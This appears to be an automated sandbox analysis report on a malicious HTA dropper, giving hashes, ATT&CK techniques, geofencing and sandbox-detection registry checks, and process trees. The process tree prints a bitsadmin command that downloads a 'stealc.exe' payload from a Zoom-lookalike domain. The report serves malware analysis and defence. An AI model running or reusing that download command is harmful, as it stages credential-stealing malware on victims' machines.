92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138

General

Target

xyz.hta
Size

74KB
MD5

acfba6ff2e80e0ebc80df9e7d326337c
SHA1

fe28d5756815fdac31a744a2f11c075f5b1892bc
SHA256

92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138
SHA512

2dcea669b4b3135bca6eba88542948188e25fb040db0a83bac03957b1fd59037998e7bb4a38774115ca051f07cbeacf99fd95113321e6c8fae4568a2e4e30f00
SSDEEP

768:BfaGWSO85ALmEcHUfkJ7Bate4LV1VZ6Y3PaNNHpXKMcpgUj:gGZALNcH77BajLbf61NR1pcbj

Score

8^/10

google discovery dropper phishing

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

Processes:

mshta.exe

flow pid process

10 1540 mshta.exe
14 1540 mshta.exe
23 1540 mshta.exe
25 1540 mshta.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

448 bitsadmin.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation mshta.exe
Detected potential entity reuse from brand GOOGLE.
phishing google
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
10	1540	mshta.exe
14	1540	mshta.exe
23	1540	mshta.exe
25	1540	mshta.exe

pid	process
448	bitsadmin.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	mshta.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

mshta.execmd.exetimeout.exebitsadmin.exetaskkill.exemshta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2724 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1844 taskkill.exe

pid	process
2724	timeout.exe

pid	process
1844	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

SearchProtocolHost.exeSearchFilterHost.exeSearchIndexer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21824 = "Camera Roll"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-12385 = "Favorites Bar"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-8 = "Microsoft Malayalam to Latin Transliteration"	SearchIndexer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.DVR-MS\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9905 = "Video Clip"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-6 = "Microsoft Cyrillic to Latin Transliteration"	SearchIndexer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-1 = "Microsoft Language Detection"	SearchIndexer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21825 = "3D Objects"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000a551b05d3c32db01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9932 = "MP4 Video"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9936 = "QuickTime Movie"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-4 = "Microsoft Simplified Chinese to Traditional Chinese Transliteration"	SearchIndexer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-101 = "Microsoft Excel Worksheet"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-177 = "Microsoft PowerPoint Macro-Enabled Slide Show"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-140 = "Microsoft OneNote Section"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000057d6ca5a3c32db01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\Windows.UI.Immersive.dll,-38304 = "Public Account Pictures"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000003026ba5a3c32db01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9907 = "MIDI Sequence"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\windows.storage.dll,-10152 = "File folder"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-116 = "Microsoft Excel Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-34583 = "Saved Pictures"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000005dbf145b3c32db01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9939 = "ADTS Audio"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\cabview.dll,-20 = "Cabinet File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-7 = "Microsoft Devanagari to Latin Transliteration"	SearchIndexer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-127 = "OpenDocument Text"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000cfa9e55c3c32db01	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{AEB16279-B750-48F1-8586-97956060175A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000eb3cbc5d3c32db01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.DVR-MS	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9911 = "Windows Media Audio shortcut"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-10 = "Microsoft Hangul Decomposition Transliteration"	SearchIndexer.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5383EF74-273B-4278-AB0C-CDAA9FD5369E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000cf0dc95c3c32db01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9926 = "M3U file"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-3 = "Microsoft Traditional Chinese to Simplified Chinese Transliteration"	SearchIndexer.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000153ff75b3c32db01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-123 = "Microsoft Word Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-5 = "Microsoft Transliteration Engine"	SearchIndexer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9937 = "3GPP Audio/Video"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\msxml3r.dll,-1 = "XML Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000067e5e05c3c32db01	SearchProtocolHost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exe

pid	process
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

4744 taskmgr.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

Processes:

taskmgr.exeSearchIndexer.exe

description	pid	process
Token: SeDebugPrivilege	4744	taskmgr.exe
Token: SeSystemProfilePrivilege	4744	taskmgr.exe
Token: SeCreateGlobalPrivilege	4744	taskmgr.exe
Token: 33	4612	SearchIndexer.exe
Token: SeIncBasePriorityPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4612	SearchIndexer.exe
Token: SeSecurityPrivilege	4744	taskmgr.exe
Token: SeTakeOwnershipPrivilege	4744	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe
4744	taskmgr.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

SearchIndexer.exemshta.execmd.exe

description	pid	process	target process
PID 4612 wrote to memory of 5000	4612	SearchIndexer.exe	SearchProtocolHost.exe
PID 4612 wrote to memory of 5000	4612	SearchIndexer.exe	SearchProtocolHost.exe
PID 4612 wrote to memory of 4488	4612	SearchIndexer.exe	SearchFilterHost.exe
PID 4612 wrote to memory of 4488	4612	SearchIndexer.exe	SearchFilterHost.exe
PID 1100 wrote to memory of 2720	1100	mshta.exe	cmd.exe
PID 1100 wrote to memory of 2720	1100	mshta.exe	cmd.exe
PID 1100 wrote to memory of 2720	1100	mshta.exe	cmd.exe
PID 1100 wrote to memory of 448	1100	mshta.exe	bitsadmin.exe
PID 1100 wrote to memory of 448	1100	mshta.exe	bitsadmin.exe
PID 1100 wrote to memory of 448	1100	mshta.exe	bitsadmin.exe
PID 2720 wrote to memory of 2724	2720	cmd.exe	timeout.exe
PID 2720 wrote to memory of 2724	2720	cmd.exe	timeout.exe
PID 2720 wrote to memory of 2724	2720	cmd.exe	timeout.exe
PID 2720 wrote to memory of 1844	2720	cmd.exe	taskkill.exe
PID 2720 wrote to memory of 1844	2720	cmd.exe	taskkill.exe
PID 2720 wrote to memory of 1844	2720	cmd.exe	taskkill.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\xyz.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:1540

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4744

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612
- C:\Windows\system32\SearchProtocolHost.exe
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  - Modifies data under HKEY_USERS
  PID:5000
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 784
  2⤵
  - Modifies data under HKEY_USERS
  PID:4488

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\xyz.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1100
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2720
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 30 /nobreak
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:2724
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /PID
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:1844
- C:\Windows\SysWOW64\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe
  2⤵
  - Download via BitsAdmin
  - System Location Discovery: System Language Discovery
  PID:448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

1

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

4

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\XH3Z2ZON\favicon[1].ico

Filesize
5KB

MD5
f3418a443e7d841097c714d69ec4bcb8

SHA1
49263695f6b0cdd72f45cf1b775e660fdc36c606

SHA256
6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

SHA512
82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

Download Submit
memory/4488-72-0x000001DA09400000-0x000001DA09410000-memory.dmp

Filesize
64KB

Download
memory/4488-73-0x000001DA09400000-0x000001DA09410000-memory.dmp

Filesize
64KB

Download
memory/4488-79-0x000001DA09400000-0x000001DA09410000-memory.dmp

Filesize
64KB

Download
